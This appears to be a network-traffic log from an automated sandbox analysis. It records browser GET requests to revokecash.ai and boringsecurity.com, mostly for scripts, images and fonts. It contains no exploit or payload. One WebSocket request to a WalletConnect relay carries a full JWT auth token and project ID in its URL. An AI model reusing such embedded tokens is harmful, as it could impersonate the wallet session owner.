Source: global trafficHTTP traffic detected: GET /_img/premint.jpg HTTP/1.1Host: revokecash.aiConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_img/layer3.jpg HTTP/1.1Host: revokecash.aiConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_img/boring-security.png HTTP/1.1Host: revokecash.aiConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /learn/faq HTTP/1.1Host: revokecash.aiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /init HTTP/1.1Host: revokecash.aiConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: W/"c-rDu2skaeL3muTsdSOt0zV7fI+kc"
Source: global trafficHTTP traffic detected: GET /?auth=eyJhbGciOiJFZERTQSIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJkaWQ6a2V5Ono2TWt0cWZHOEFlMTE1M1k2TnBrTmZUVk1XYUo4YUs3dFRwbTRwMzJydWhUZFExWCIsInN1YiI6IjUxZWJiYzg4YTBiZDMxMDI5ZGUxM2QyYjAwOGNjY2U5Mjc3NjEzOGI5YmJkZTAxMzcxMTQ5ZGQ5ZWM0YzA1YzYiLCJhdWQiOiJ3c3M6Ly9yZWxheS53YWxsZXRjb25uZWN0Lm9yZyIsImlhdCI6MTcwMjIyNjY3MCwiZXhwIjoxNzAyMzEzMDcwfQ.Ksnssgch7O9_s2QwBldJoDsuqio5h-UjGol65nFFL8ubcBFiX7_5nF0M_Okgh51FBtAJ1hjt3mZtZcc1D33uCQ&projectId=4de540f0804c83871ac4d89ebb9031e9&ua=wc-2%2Fjs-2.9.0%2Fwindows10-chrome-117.0.0%2Fbrowser%3Arevokecash.ai&useOnCloseEvent=true HTTP/1.1Host: relay.walletconnect.orgConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://revokecash.aiSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: 85cGjnJTmKzRhVbQozZSvg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /sponsorships HTTP/1.1Host: revokecash.aiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/ad4aef9984e4c1fd.css HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/webpack-2f410aecd915a041.js HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/framework-281bd828f4ecdac7.js HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/main-92fafea216160eb7.js HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/_app-82695a3e9af0e644.js HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/d3a2d874-4eb3a08696765140.js HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/514-a4b28d509d8a38e7.js HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/BoringSecurityMurAll.png HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/_next/static/css/ad4aef9984e4c1fd.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/steel.jpg HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/_next/static/css/ad4aef9984e4c1fd.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/940-c7b68c0e005aa30a.js HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/image?url=%2Fimages%2Flogo.png&w=64&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/image?url=%2Fimages%2Flogo.png&w=256&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/98-5331d5e48bc919a7.js HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_ipx/w_64,q_75/%2Fimages%2Flogo.png?url=%2Fimages%2Flogo.png&w=64&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_ipx/w_256,q_75/%2Fimages%2Flogo.png?url=%2Fimages%2Flogo.png&w=256&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/steel.jpg HTTP/1.1Host: boringsecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/59-d0e28623b64e6b96.js HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/196-de1449618af62cf8.js HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/index-91b2c5d3a0144c32.js HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/gCkYQnlwM1KFyjXElH0ki/_buildManifest.js HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/gCkYQnlwM1KFyjXElH0ki/_ssgManifest.js HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_ipx/w_64,q_75/%2Fimages%2Flogo.png?url=%2Fimages%2Flogo.png&w=64&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/BoringSecurityMurAll.png HTTP/1.1Host: boringsecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/grill.jpg HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/_next/static/css/ad4aef9984e4c1fd.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_ipx/w_256,q_75/%2Fimages%2Flogo.png?url=%2Fimages%2Flogo.png&w=256&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/image?url=%2Fimages%2Fbanner.jpeg&w=2048&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/364.0af60d1a7584dacb.js HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/331.02933a2f314cb75f.js HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/924.bd5f832b6d1a0e30.js HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /parseGridNftDataToCanvas.worker.js HTTP/1.1Host: boringsecurity.comConnection: keep-aliveOrigin: https://boringsecurity.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_ipx/w_2048,q_75/%2Fimages%2Fbanner.jpeg?url=%2Fimages%2Fbanner.jpeg&w=2048&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/grill.jpg HTTP/1.1Host: boringsecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /parseGridNftDataToCanvas.worker.js HTTP/1.1Host: boringsecurity.comConnection: keep-aliveOrigin: https://boringsecurity.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "0922e34df9afec7660bfdaeb43061ea3-ssl"
Source: global trafficHTTP traffic detected: GET /fonts/gunplay.woff2 HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://boringsecurity.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://boringsecurity.com/_next/static/css/ad4aef9984e4c1fd.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /parseGridNftDataToCanvas.worker.js HTTP/1.1Host: boringsecurity.comConnection: keep-aliveOrigin: https://boringsecurity.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "0922e34df9afec7660bfdaeb43061ea3-ssl"
